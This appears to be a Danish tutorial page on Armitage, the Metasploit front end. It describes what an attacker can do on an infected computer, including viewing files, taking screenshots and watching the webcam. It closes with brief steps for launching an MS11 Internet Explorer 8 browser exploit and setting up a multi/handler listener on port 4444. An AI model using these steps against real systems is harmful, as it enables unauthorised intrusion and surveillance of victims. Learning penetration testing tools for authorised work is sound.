Armitage

/Armitage
Armitage 2017-09-07T22:12:34+00:00

Armitage er en udbygning til “The Metasploit project”, og er et stykke software designet til at finde og udnytte svagheder og exploits i systemer. Armitage bruges til at lave forskellige former for scanninger på et system, alt fra brute force scan, intense scan osv. Disse scanninger bruges til at identificere enheder på et netværk hvor efter disse enheder bliver visuelt præsenteret og ved et enkelt højre klik vises alle de mulige exploits der kan kører som Armitage scanningen har fundet. En enhed der er inficeret vises som en rød enhed med strøm omkring den, dette betyder du har inficeret den og kan nu gøre brug at de forskellige muligheder som Armitage giver dig, som fx. Se filer i filsystem, styre computer, tage skærmbilleder, se webcam osv osv, der er næsten ingen begrænsninger for hvad du kan hvis først du får inficeret en computer. Der er også muligheder for at køre ting som Meterpreter direkte fra Armitage da der findes et Terminal program direkte der i, dette gør det muligt at køre shell og derved bruge almindelige windows commandoer via et cli på den enkelte enhed. Armitage er et godt program for personer som ikke har så meget erfaring med unix “debian” kode, eller måske ikke har helt styr på cli terminal endnu. Armitage findes også i en professionel version som går under navnet Cobalt Strike. Cobalt Strike indeholder en lang række andre angrebs muligheder, men koster også penge.

Armitage ms11 server atack

service postgresql start
service metasploit start
armitage
(søg felt til venstre)
ms11
(vælg øverste over browser)
(ændre srvport)
SSRVPORT 80
(ændre targets til 1)
1 ==> Internet Explorer 8

Armitage multi handler server attack

TERMINAL 2
use exploit/multi/handler
set LHOST “DIN IP”
set LPORT “4444” (eller den port du fik tildelt)
exploit
Et godt godt link til armitage tutorials – Link